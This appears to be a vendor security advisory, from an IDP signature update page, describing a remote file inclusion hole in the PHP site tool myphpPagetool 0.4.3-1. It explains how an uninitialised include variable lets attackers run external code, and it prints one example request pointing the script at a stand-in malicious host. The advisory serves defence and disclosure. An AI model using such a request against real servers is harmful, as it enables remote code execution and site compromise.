• IDP Daily Update #1203
  posted: 07/02/08
  
• NSM Daily Update #1203
  posted: 07/02/08
  
• Deep Inspection 5.3r5 and above, 5.4, 6.0 #1203
  posted: 07/02/08
  
• Deep Inspection 5.1, 5.2, 5.3r4 and below #1201
  posted: 07/02/08
  
• Deep Inspection 5.0 #1132
  posted: 04/01/08
  
• Antivirus
  posted: 07/01/08

Text Size:        

• Product Information
• Security Products Overview
• Juniper Networks ISG Series
• IDP Demo
• Product Poster & Z-Card 

Title: Sebastian Bunka myphpPagetool Arbitrary Code Execution Vulnerability

Severity: HIGH

Description:

myphpPagetool is an application used to maintain a web site using a mysql database, which stores and manage all web pages and their contents. myphpPagetool is written in PHP and maintained by Sebastian Bunka.

A problem exists in myphpPagetool that will allow a remote attacker to execute arbitrary code on a host running the software(with the privileges of the webserver process). It is possible to supply arbitrary data to the $include variable. This variable is used to specify a file containing PHP code that is to be executed. In PHP, values for script variables may be supplied from a web browser if they are not explicitly defined or initiated by the script. As a result, the affected script may be redirected to execute arbitrary code located on an external host, as specified by the attacker.

This issue can be exploited if the remote attacker submits a maliciously crafted URL.

This is an example of a malicious web request which will cause the script to execute arbitrary code supplied by the attacker:

http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

Affected Products:

• Sebastian Bunka myphpPagetool 0.4.3-1

References:

• Sebastian Bunka: myphpPagetool Product Homepage